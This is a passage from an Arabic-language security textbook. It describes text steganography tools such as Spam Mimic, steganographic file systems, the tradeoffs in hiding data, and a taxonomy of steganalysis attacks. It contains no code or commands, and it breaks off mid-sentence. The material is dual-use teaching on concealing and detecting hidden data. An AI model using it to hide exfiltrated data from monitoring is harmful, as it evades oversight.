‫اﻟﻣﺻدر‪http://www.spammimic.com :‬‬
‫‪ Spam Mimic‬ھو ‪ Spam‬ﻟﻣﺣرك ‪ Mimic‬ل ‪ .Peter Wayner‬ﺣﯾث ﯾﻘوم ﺑﺗرﻣﯾز‪/‬ﺗﺷﻔﯾر اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ‪ .‬اﻟﺷﻲء اﻟﻣﻣﺗﻊ ﻓﻲ ھذا اﻟﺑرﻧﺎﻣﺞ ھو اﻧﮫ ﯾﻘوم ﺑﺗرﻣﯾز اﻟرﺳﺎﻟﺔ اﻟﻰ ﻓن اﻟﻛﻼم واﻟﺗﻌﻠﯾﻘﺎت ﻓﻲ ﻟﻌﺑﺔ اﻟﺑﯾﺳﺑول‪ .‬ﻓﺈﻧﮫ ﯾوﻓر‬
‫ﻗدرات ﻟﻛل ﻣن ﻓك اﻟﺗﺷﻔﯾر واﻟﺗرﻣﯾز‪ .‬اﻟﺗرﻣﯾز‪/‬اﻟﺗﺷﻔﯾر ﻣن ﻗﺑل ھذه اﻷداة ﻋن طرﯾﻖ ﺗرﻣﯾز اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻛﺄﻧﮭﺎ رﺳﺎﻟﺔ ﻣزﻋﺟﮫ )‪(Spam‬‬
‫ﻣﻊ ﻛﻠﻣﺔ ﻣرور‪ ،fake Russian ،fake PGP ،‬اﻟﻔﺿﺎء‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪476‬‬

‫‪Natural Text Steganography: Sams Big G Play Maker‬‬

‫ﺑراﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻧﺻﯾﺔ ﺗﻘوم ﺑﺗﺣوﯾل اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ إﻟﻰ ﻋﻧﺎﺻر ﺣرﯾﺔ اﻟﺗﻌﺑﯾر اﻟﻣﻌرﻓﺔ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻣﺛل ‪.Play‬‬
‫‪ Sams Big 6 Play Maker‬ﯾﺳﺎﻋد ﻓﻲ أداء ‪.natural text steganography‬‬
‫‪ Sams Big G Play Maker‬ھو ﺑرﻧﺎﻣﺞ ﻣﺳﺗﻧد إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ ﺷﻛل ﻣﺳرﺣﯾﺔ‬
‫)‪ (Play‬ﻣﺳﻠﯾﺔ أو ﻣﺣﺎدﺛﺔ‪ .‬ھذا ﯾﻧطﺑﻖ ﻋﺎدة ﻋﻠﻰ اﻟرﺳﺎﺋل اﻟﺻﻐﯾرة‪ .‬ﯾﺗم إﺧراج اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺗﻲ ﯾﺗم إﻧﺷﺎؤھﺎ ﺑﺎﺳﺗﺧدام ھذه اﻷداة‪ ،‬ﻻ ﯾﻣﻛن‬
‫ﻟﻠﻣرء أن ﯾدرك أن ﻧص اﻟﻣﺳرﺣﯾﺔ اﻟﻧﺎﺗﺞ ﯾﺣﺗوي ﻋﻠﻰ اﻟرﺳﺎﻟﺔ اﻟﺧﻔﯾﺔ‪.‬‬

‫ﻣﺳﺎﺋل ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت)‪(Issues in Information Hiding‬‬


‫ﺗﻧﺎﻗش اﻟﻣﻘﺎطﻊ اﻟﺛﻼﺛﺔ اﻟﺗﺎﻟﯾﺔ اﻟﻘﺿﺎﯾﺎ اﻟﺗﻲ ﯾﺟب أﺧذھﺎ ﻓﻲ اﻻﻋﺗﺑﺎر ﻋﻧد إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫‪Steganographic File System -1‬‬
‫ﻓﻲ ‪ ،steganographic file system‬ﯾﻘوم ﺑﺈﺧﻔﺎء ﻛﻣﯾﺔ ﻛﺑﯾرة ﻧﺳﺑﯾﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﺿﻣن ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﻣﺿﯾف اﻟﻘﺎﺋﻣﺔ‪.‬‬
‫‪ Steganographic file system‬ﯾﻘوم ﺑﺗﺟﻣﯾﻊ أﺟزاء )‪ (allocates dynamically fragments‬ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ إﻟﻰ ﻣواﻗﻊ‬
‫ﻏﯾر ﻣﺳﺗﺧدﻣﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﺗﺧزﯾن‪ ،‬ﻣﻣﺎ ﯾﺳﻣﺢ ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻟﺗﻛون ﺟزءا ﺿﻣن ﻧظﺎم ﻣﻠﻔﺎت اﻟﻣﺿﯾف‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ أﯾﺿﺎ ﻟﻠﻣﺳﺗﺧدﻣﯾن‬
‫ﻹﻋطﺎء أﺳﻣﺎء وﻛﻠﻣﺔ اﻟﻣرور )ﻣﻔﺎﺗﯾﺢ اﻟوﺻول( ﻟﻠﻣﻠﻔﺎت‪ .‬ﻓﻲ ھذه اﻟطرﯾﻘﺔ‪ ،‬ﯾﺗم ﺗﻌﺗﯾم اﻟﺑﯾﺎﻧﺎت ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺎت اﻟﺗﺷﻔﯾر‪ ،‬وﻟﻛن ﯾﺗم رﻓض‬
‫وﺟود اﻟﺑﯾﺎﻧﺎت دون ﻣﻔﺗﺎح اﻟوﺻول اﻟﻣﻘﺎﺑﻠﺔ‪ ،‬أي اﻟﺗﻲ ﺗﻌطﻰ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ .‬دون ﻣﻔﺗﺎح اﻟوﺻول اﻟﻣﻧﺎﺳﺑﺔ )ﻛﻠﻣﺔ اﻟﻣرور( ﻓﺎن اﻟﻣﮭﺎﺟم ﻻ‬
‫ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت ﻣن اﻟﻣﻠف‪.‬‬
‫ﯾﺗم اﺳﺗﺧدام اﻟطرﯾﻘﺔ اﻟﺗﺎﻟﯾﺔ ﻟﺑﻧﺎء ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪:‬‬
‫‪ -‬ﯾﺑدأ ﻧظﺎم اﻟﻣﻠﻔﺎت ﻣﻊ ﺑﯾﺎﻧﺎت ﻋﺷواﺋﯾﺔ‪.‬‬
‫‪ -‬اﻟﻛﺗل اﻟﻣﺷﻔرة ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ إﻟﻰ ﻣواﻗﻊ ﻣزﯾﻔﮫ ﺑﺎﺳﺗﺧدام اﻟﻣﻔﺗﺎح واﻟذي ﯾﺗم اﻟﺣﺻول ﻋﻠﯾﮫ ﻣن اﺳم اﻟﻣﻠف وﻛﻠﻣﺔ ﻣرور اﻟﻣﺟﻠد ﻹﺧﻔﺎء‬
‫اﻟﻣﻠف ﻓﻲ ﻛﺗل ﺑﯾﺎﻧﺎت ﻋﺷواﺋﯾﺔ‪ .‬ﻓﺎذا اﺳﺗﻣر اﻟﻛﺗﺎﺑﺔ ﻋﻠﻰ ﻧظﺎم اﻟﻣﻠﻔﺎت‪ ،‬ﻓﺎن ﻣن اﻟﻣﺗوﻗﻊ ﺣدوث اﺻطداﻣﺎت وﯾﺗم إﻋﺎدة اﻟﻛﺗﺎﺑﺔ ﻓوق‬
‫اﻟﻛﺗل‪ ،‬ﻣﻣﺎ ﯾﺳﻣﺢ ﺳوى ﻟﺟزء ﺻﻐﯾر ﻣن ﻣﺳﺎﺣﺔ اﻟﻘرص ﻻﺳﺗﺧداﻣﮭﺎ ﺑﺄﻣﺎن‪.‬‬
‫‪ -‬ﯾﻧﺑﻐﻲ أن ﺗﻧﺳﺦ اﻟﻌدﯾد ﻣن اﻟﻛﺗل‪.‬‬
‫‪ -‬ﻣطﻠوب أﯾﺿﺎ طرﯾﻘﺔ ﻟﺗﺣدﯾد اﻟﻛﺗل اﻟﺗﻲ ﺗم إﻋﺎدة اﻟﻛﺗﺎﺑﺔ ﻋﻠﯾﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪477‬‬

‫اﻻﺣﺗﯾﺎج ﻷﻧظﻣﺔ اﻟﻣﻠﻔﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ )‪(Need for steganographic file systems‬‬


‫ﺗوﻓﯾر أﻧظﻣﺔ ﻣﻠﻔﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﺣﻣﺎﯾﺔ إﺿﺎﻓﯾﺔ ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﺑطرﯾﻘﺔ ﻣرﯾﺣﺔ‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذه‪ ،‬ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن ﺗﺧزﯾن‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ )ﻣﺛل اﻷﺳرار اﻟﺗﺟﺎرﯾﺔ( أو اﻟﻣﺎﻟﯾﺔ ﻋﻠﻰ أﻧظﻣﺗﮭﺎ دون أي ﺧوف‪ .‬ﻟﻠوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﯾﺟب ﻋﻠﻰ اﻟﺷﺧص إﺟراء‬
‫اﻷذوﻧﺎت اﻟﻣﻣﻧوﺣﺔ واﻟﻣﻌرﻓﺔ واﻟﺗﻲ ﺑدوﻧﮭﻣﺎ ﻻ ﯾﻣﻛن اﻟوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت ﻓﻲ ﻣﻠف‪ .‬ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻻ ﺗﻘوم ﺑﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت ﻓﻘط‬
‫وﻟﻛن أﯾﺿﺎ ﺗﻘوم ﺑﺈﺧﻔﺎء وﺟود اﻟﺑﯾﺎﻧﺎت‪ .‬اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ھﻲ ﺿﻣن ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻻ ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﻗﺑل أن ﯾﺿطر‬
‫اﻟﻣﺳﺗﺧدم اﺳﺗﺧدام ﻣﻔﺗﺎح اﻟوﺻول )اﻷذوﻧﺎت اﻟﻣﻣﻧوﺣﺔ(‪.‬‬
‫‪ Levels of Visibility -2‬ﻣﺳﺗوﯾﺎت اﻟرؤﯾﺔ‬
‫إذا ﻛﺎﻧت ﻋﻣﻠﯾﺔ اﻟﺗﺿﻣﯾن ﻗﺎﻣت ﺑﺗﺷوﯾﮫ اﻟﻐطﺎء ﻟدرﺟﺔ أﻧﮫ ﺗﻛون ﻏﯾر ﻣﻠﺣوظﮫ ﺑﺻرﯾﺎ‪ ،‬وھذا ﯾﻌﻧﻲ إذا ﺗم ﺗﺷوﯾﮫ اﻟﺻورة ﺑﺷﻛل واﺿﺢ‪ ،‬ﻓﮭذا‬
‫ﯾﻌﻧﻰ ان اﻟﻧﺎﻗل ﻏﯾر ﻛﺎﻓﻲ ﻟﻠﺣﻣوﻟﺔ‪ .‬وﺑﺎﻟﻣﺛل‪ ،‬إذا ﻟم ﯾﺗم ﺗﺷوﯾﮫ اﻟﺻورة‪ ،‬ﻓﮭذا ﯾﻌﻧﻰ أن اﻟﻧﺎﻗل ﻛﺎﻓﻲ‪ .‬واﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ ﺗﺿﻣﯾن اﻟرﺳﺎﻟﺔ ﯾﺗم‬
‫ﺗﺣدﯾدھﺎ ﻋن طرﯾﻖ إذا ﻛﺎﻧت اﻟﺑﯾﺎﻧﺎت ﻏﯾر ﻣﺣﺳوﺳﺔ أم ﻻ‪ .‬ﻟﻠﺣد ﻣن ﺳرﻗﺔ اﻟﺑﯾﺎﻧﺎت‪ ،‬ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺗم ﻧﺷر وﺟود اﻟﻌﻼﻣﺔ اﻟﻣﺎﺋﯾﺔ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺎن‬
‫ﻧﺷر وﺟود اﻟﻌﻼﻣﺔ اﻟﻣﺎﺋﯾﺔ ﯾﺗﯾﺢ اﻟﻌدﯾد ﻣن اﻷﺳﺎﻟﯾب اﻟﺗﻲ ﯾﺗﻌﯾن ﺗﻧﻔﯾذھﺎ ﻟﻣﺣﺎوﻟﺔ ﺗﻐﯾﯾر أو ﺗﻌطﯾل اﻟﻌﻼﻣﺔ اﻟﻣﺎﺋﯾﺔ‪ .‬ﻋﻧد زﯾﺎدة وﺿوح اﻟﺑﯾﺎﻧﺎت‪،‬‬
‫ﻓﺎن ھذا ﯾزﯾد أﯾﺿﺎ ﻣن اﺣﺗﻣﺎﻻت اﻟﺗﻼﻋب ﻓﻲ اﻟﺑﯾﺎﻧﺎت‪.‬‬
‫‪ -3‬اﻟﻣﺗﺎﻧﺔ ﻣﻘﺎﺑل اﻟﺣﻣوﻟﺔ )‪(Robustness versus Payload‬‬
‫ﻣن أﺟل أن ﯾﻛون ھﻧﺎك وﺳﯾﻠﺔ ﻗوﯾﺔ ﻣن ﺗﺿﻣﯾن اﻟرﺳﺎﻟﺔ‪ ،‬ﯾﻧﺑﻐﻲ اﻟﺣﻔﺎظ ﻋﻠﻰ اﻟﺗﻛرار ﻟﻣﻘﺎوﻣﺔ اﻟﺗﻐﯾﯾرات اﻟﺗﻲ أدﺧﻠت ﻋﻠﻰ اﻟﻐطﺎء‪ .‬وﻣﻊ ذﻟك‪،‬‬
‫ﻓﺎن زﯾﺎدة ﻣﺗﺎﻧﺔ اﻟرﺳﺎﻟﺔ ﯾﻌﻧﻲ أن ﻣﺳﺎﺣﺔ أﻗل ﺻﺎﻟﺣﺔ ﻟﻼﺳﺗﻌﻣﺎل ﻟﻠﺣﻣوﻟﺔ‪ .‬ﯾﺟب وزن اﻟﻣﺗﺎﻧﺔ ﺿد ﺣﺟم اﻟﺣﻣوﻟﺔ‪.‬‬
‫‪File Format Dependence -4‬‬
‫ﺗﺣوﯾل اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ‪ lossless information‬إﻟﻰ ﻣﻠﻔﺎت ﻣﺿﻐوطﺔ ﺗﺣﺗوي ﻋﻠﻰ ‪ Lossy information‬ﯾﻣﻛﻧﮭﺎ أن ﯾدﻣر‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﻣوﺟودة ﻓﻲ اﻟﻐطﺎء‪ .‬ﺑﻌض ﻋﻣﻠﯾﺎت ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﺗﻌﺗﻣد ﻋﻠﻰ ﺗﻧﺳﯾﻖ اﻟﻣﻠف اﻟﻧﺎﻗل‪ ،‬ﻓﻲ ﺣﯾن أن آﺧرﯾن ﻻ ﯾﻌﺗﻣدون ﻋﻠﻰ‬
‫ﺗﻧﺳﯾﻖ اﻟﻣﻠف‪ .‬ﯾﺳﺗﺧدم ﺧوارزﻣﯾﺔ ﺿﻐط ‪ jpeg‬ﺣﺳﺎﺑﺎت ‪ floating-point‬ﻟﺗرﺟﻣﺔ اﻟﺻورة إﻟﻰ ﻣﺟﻣوﻋﺔ ﻣن اﻷﻋداد اﻟﺻﺣﯾﺣﺔ‪ .‬ﻋﻣﻠﯾﺔ اﻟﺗﺣوﯾل‬
‫ھذه ﯾﻣﻛن أن ﯾؤدي إﻟﻰ أﺧطﺎء اﻟﺗﻘرﯾب اﻟﺗﻲ ﻗد ﺗﻘﺿﻰ ﻋﻠﻰ أﺟزاء ﻣن اﻟﺻورة‪ .‬ﻻ ﺗؤدي ھذه اﻟﻌﻣﻠﯾﺔ ﻓﻲ أي اﺧﺗﻼف ﻣﻠﺣوظ ﻓﻲ اﻟﺻورة‪.‬‬
‫وﻋﻠﻰ اﻟرﻏم ﻣن ذﻟك‪ ،‬ﻓﺎن اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن أن ﺗﺻﺑﺢ ﺗﺎﻟﻔﺔ‪ .‬ﺑﻌض اﻟﺧوارزﻣﯾﺎت اﻟﺷﻌﺑﯾﺔ اﻷﺧرى‪ ،‬وھﻣﺎ )‪Windows Bitmap (BMP‬‬
‫و)‪ ،Graphic Interchange Format (GIF‬ﺗﻌﺗﺑر ‪ .Lossless compressions‬اﻟﺻور اﻟﻣﺿﻐوطﺔ ھو ﺗﻣﺛﯾل دﻗﯾﻖ ﻟﻠﺻور اﻷﺻﻠﯾﺔ‪.‬‬

‫‪Steganalysis‬‬
‫‪Steganalysis‬ھﻲ ﻋﻣﻠﯾﺔ ﻋﻛﺳﯾﺔ ﺿد ‪ .steganography‬ﺣﯾث ‪ steganography‬ﯾﺳﺗﺧدم ﻓﻲ إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت‪ ،‬ﺑﯾﻧﻣﺎ ‪Steganalysis‬‬
‫ﯾﺳﺗﺧدم ﻟﻠﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺣدد اﻟرﺳﺎﻟﺔ اﻟﺧﻔﯾﺔ اﻟﻣﺷﻔرة‪ ،‬وإذا ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ‪ ،‬ﻓﺈﻧﮫ ﯾﺳﺗرد ﺗﻠك اﻟرﺳﺎﻟﺔ‪ .‬وﯾﻣﻛن اﻟﻛﺷف ﻋن‬
‫اﻟرﺳﺎﻟﺔ ﻣن ﺧﻼل اﻟﻧظر ﻓﻲ اﻟﻔروق ﺑﯾن أﻧﻣﺎط اﻟﺑت وأﺣﺟﺎم اﻟﻣﻠﻔﺎت اﻟﻛﺑﯾرة ﺑﺷﻛل ﻏﯾر ﻋﺎدي‪.‬‬

‫اﻟﺧطوة اﻷوﻟﻰ ﻓﻲ ‪ Steganalysis‬ھو اﻛﺗﺷﺎف اﻟﺻورة اﻟﺗﻲ ﯾﺷﺗﺑﮫ ﻓﯾﮭﺎ ﺑﺈﯾواء رﺳﺎﻟﺔ‪ .‬وﯾﻌﺗﺑر أن ھذا ھﺟوم ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ‪ .‬ھﻧﺎك‬
‫ﻧوﻋﺎن ﻣن أﻧواع اﻟﮭﺟﻣﺎت اﻷﺧرى ﺿد إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ message attacks :‬و‪.chosen-message attacks‬‬
‫‪ Steganalyst‬ﯾﻌرف ﺑوﺟود اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﻠف‪ stego-image‬اﻟﻣﻘﺎﺑل‪ .‬ﯾﺣدد ‪ steganalyst‬اﻷﻧﻣﺎط اﻟﺗﻲ ﺗﻧﺷﺄ ﻣن إﺧﻔﺎء اﻟرﺳﺎﻟﺔ‬
‫وﻛﺷف ھذه اﻟرﺳﺎﻟﺔ‪ Steganalyst .‬ﯾﻘوم ﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام أداة ‪ stego‬ﯾﻌرف وﯾﺣﻠل اﻻﺧﺗﻼﻓﺎت ﻓﻲ اﻷﻧﻣﺎط‪.‬‬

‫ﺻور اﻟﻐطﺎء ﺗﻛﺷف ﻋن اﻟﻣزﯾد ﻣن اﻟﻘراﺋن اﻟﺑﺻرﯾﺔ ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ ‪ .stego-image‬ﻓﻣن اﻟﺿروري ﺗﺣﻠﯾل ‪ stego-image‬ﻟﺗﺣدﯾد‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم إﺧﻔﺎؤھﺎ‪ .‬اﻟﻔﺟوة ﺑﯾن ﺻورة اﻟﻐطﺎء وﺣﺟم اﻟﻣﻠف ‪ stego-image‬ﻣن اﻟﺳﮭل ﺗوﻗﻌﮫ‪ .‬اﻟﻌدﯾد ﻣن اﻟﺗوﻗﯾﻌﺎت ﺗﻛون واﺿﺣﺔ‬
‫ﺑﺎﺳﺗﺧدام اﻟﻌدﯾد ﻣن اﺳﻛﯾﻣﺎت اﻷﻟوان ﻣن ﺻورة اﻟﻐطﺎء‪.‬‬
‫ﺑﻣﺟرد اﻛﺗﺷﺎﻓﮭﺎ‪ Stego-image ،‬ﯾﻣﻛن ﺗدﻣﯾرھﺎ أو ﺗﻌدﯾل اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ‪ .‬ﺑﻌض اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم اﺧﻔﺎﺋﮭﺎ ﺑداﺧل اﻟﺻورة ﺑﺎﺳﺗﺧدام‬
‫‪ Image Domain Tool‬ﯾﻣﻛن أن ﺗﻛون ﻋدﯾم اﻟﻔﺎﺋدة‪.‬‬

‫ﺗﺣدﯾﺎت‪: Steganalysis‬‬
‫‪ -‬ﺗﯾﺎر اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺷﺗﺑﮫ ﻓﯾﮫ ﻗد أو ﻗد ﻻ ﯾﻣﻠك ﺗرﻣﯾز اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ‬
‫‪Suspect information stream may or may not have encoded hidden data‬‬
‫‪ -‬اﻟﻛﺷف ﻋن ﻛﻔﺎءة ودﻗﺔ اﻟﻣﺣﺗوﯾﺎت اﻟﻣﺧﺑﺄة داﺧل اﻟﺻور اﻟرﻗﻣﯾﺔ‪.‬‬
‫‪Efficient and accurate detection of hidden content within digital images‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪478‬‬

‫ﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﻗﺑل ﺗﺿﻣﯾﻧﮫ داﺧل اﻟﻣﻠف أو إﺷﺎرة‬ ‫‪-‬‬


‫‪Encrypts the hidden data before inserted into a file or signal‬‬
‫ﺑﻌض اﻹﺷﺎرات اﻟﻣﺷﺗﺑﮫ ﻓﯾﮫ أو اﻟﻣﻠﻔﺎت ﻗد ﺗﺣﺗوي ﻋﻠﻰ ﺑﯾﺎﻧﺎت ذات ﺻﻠﮫ أو ﺿوﺿﺎء ﺑداﺧﻠﮭﺎ‪.‬‬ ‫‪-‬‬

‫‪Steganalysis Methods/Attacks on Steganography‬‬

‫ﯾﺗم ﺗﻘﺳﯾم اﻟﮭﺟﻣﺎت ﺿد ‪ Steganography‬إﻟﻰ ﺛﻣﺎﻧﯾﺔ أﻧواع ﻛﺎﻻﺗﻰ‪:‬‬


‫‪Stego-only attacks reformat attacks, known-cover attacks, known-message attacks, known-stego‬‬
‫‪attacks, chosen-stego attacks, chosen-message attacks, and disabling attacks.‬‬
‫‪Stego-only attack‬‬
‫ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﺣدث ﻋﻧدﻣﺎ ﻻ ﯾوﺟد ﺳوى ‪ ،stego-medium‬واﻟﺗﻲ ﺗﻧﻔذ اﻟﮭﺟوم‪ .‬اﻟطرﯾﻘﺔ اﻟوﺣﯾدة ﻟﺗﺟﻧب ھذا اﻟﮭﺟوم ھو ﻋن طرﯾﻖ‬
‫اﻟﻛﺷف واﺳﺗﺧراج اﻟرﺳﺎﻟﺔ اﻟﻣﺿﻣﻧﺔ‪.‬‬
‫‪Reformat attack‬‬
‫ﻓﻲ ھذه اﻟطرﯾﻘﺔ ﯾﺗم ﺗﻐﯾﯾر ﺗﻧﺳﯾﻖ اﻟﻣﻠف‪ .‬ﺣﯾث ان ﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت اﻟﻣﺧﺗﻠﻔﺔ ﺗﻘوم ﺑﺗﺧزﯾن اﻟﺑﯾﺎﻧﺎت ﺑطرق ﻣﺧﺗﻠﻔﺔ‪.‬‬
‫‪Known-cover attack‬‬
‫ﯾﺗم اﺳﺗﺧدام ھذا اﻟﮭﺟوم ﻣﻊ وﺟود ‪ stego-medium‬ﻓﺿﻼ ﻋن ‪ .cover-medium‬وھذا ﻣن ﺷﺄﻧﮫ ﺗﻣﻛﯾن اﻟﻣﻘﺎرﻧﺔ ﺑﯾن اﻟوﺳﺎﺋط ﺑﺣﯾث‬
‫ﯾﻣﻛن اﻟﻛﺷف ﻋن اﻟﺗﻐﯾﯾر ﻓﻲ ﺻﯾﻎ اﻟوﺳﺎﺋط‪.‬‬
‫‪Known-message attack‬‬
‫ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻔﺗرض وﺟود ﻛﻼ ﻣن اﻟرﺳﺎﻟﺔ و‪ .stego-medium‬ﺑواﺳطﺔ ھذه اﻟﺗﻘﻧﯾﺔ ﯾﻣﻛن إﯾﺟﺎد اﻟرﺳﺎﻟﺔ اﻟﻣﺿﻣﻧﺔ‪.‬‬
‫‪Known-Stego attack‬‬
‫ﻓﻲ ھذا اﻟﮭﺟوم‪ ،‬ﯾﺗم ﺗﻌرﯾف اﻟﺧوارزﻣﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت واﻟﻣﻠف اﻷﺻﻠﻲ و‪ Stego-object‬ﻛﻼھﻣﺎ ﻣﺗﺎح‪.‬‬
‫‪Chosen-stego attack‬‬
‫ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﺣدث ﻋﻧدﻣﺎ ﯾوﻟد ‪ forensic investigator‬ال ‪ stego-medium‬ﻣن اﻟرﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام أداة ﺧﺎﺻﺔ‪ .‬اﻟﺑﺣث ﻋن‬
‫اﻟﺗوﻗﯾﻌﺎت ﯾﻣﻛن اﻟﻛﺷف ﻋن ‪ steganography mediums‬اﻷﺧرى واﻟﺗﻲ ﯾﻣﻛن ﺣﻣل ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم‪.‬‬
‫‪Chosen-message attack‬‬
‫‪ Steganalyst‬ﯾوﻟد ‪ stego-object‬ﻣن ﺑﻌض أدوات ‪steganography‬أو ﺧوارزﻣﯾﺔ ‪steganography‬ﻟﻠرﺳﺎﻟﺔ اﻟﻣﺧﺗﺎرة‪ .‬اﻟﮭدف ﻣن ھذا‬
‫اﻟﮭﺟوم ھو ﺗﺣدﯾد أﻧﻣﺎط ﻓﻲ ‪ stego-object‬واﻟﺗﻲ ﻗد ﺗﺷﯾر إﻟﻰ اﺳﺗﺧدام أدوات ‪steganography‬ﻣﻌﯾﻧﺔ أو ﺧوارزﻣﯾﺎت ‪.steganography‬‬
‫‪Disabling or active attacks‬‬
‫ﯾﺻﻧف ھذه إﻟﻰ ﺳﺗﺔ أﺟزاء‪ ،‬واﻟﺗﻲ ﺗﺷﻣل اﻟطﻣس)‪ ، (blur‬ﺗﻘﻠﯾل اﻟﺿوﺿﺎء)‪ ،rotate ،sharpen ، (noise reduction‬إﻋﺎدة ﺗﺷﻛﯾﻠﮫ‬
‫)‪ ،(resample‬و‪ Disabling attacks .soften‬ﯾﻣﻛﻧﮫ ﺗﺳﮭﯾل اﻟﺗﺣوﻻت و ﺗﻘﻠﯾل اﻟﺗﺑﺎﯾن ﻋن طرﯾﻖ ﺣﺳﺎب ﻣﺗوﺳط ﺑﻛﺳل اﻟﻣوﺟود ﺑﺟﺎﻧب‬
‫اﻟﺣواف اﻟﺛﺎﺑت ﻟﻠﺧطوط اﻟﻣﺣددة و اﻟﻣﻧﺎطﻖ اﻟﺗﻲ ﺗوﺟد ﻓﯾﮭﺎ ﺗﺣوﻻت اﻟﻠون ﻛﺑﯾرة‪ .‬وھذا ﻣﺎ ﯾﺳﻣﻰ ‪ blurring‬ﻠ ‪ .stego-medium‬اﻟﺿﺟﯾﺞ‬
‫اﻟﻌﺷواﺋﻲ )‪ (random noise‬ﻓﻲ‪ stego-medium‬ﯾﻣﻛﻧﮫ إدراج ﺑﻛﺳل ﻟون ﻋﺷواﺋﻲ إﻟﻰ اﻟﺻورة‪ .‬اﻟﺿوﺿﺎء اﻟﻣوﺣدة )‪(uniform noise‬‬
‫ﯾﻣﻛﻧﮫ إدراج اﻟﺑﻛﺳل واﻷﻟوان اﻟﺗﻲ ﺗﺷﺑﮫ اﻟﺑﻛﺳل اﻷﺻﻠﻲ‪ .‬اﻟﺣد ﻣن اﻟﺿوﺿﺎء )‪ (noise reduction‬ﯾﻘﻠل ﻣن اﻟﺿوﺿﺎء ﻓﻲ اﻟﺻورة ﻣن‬
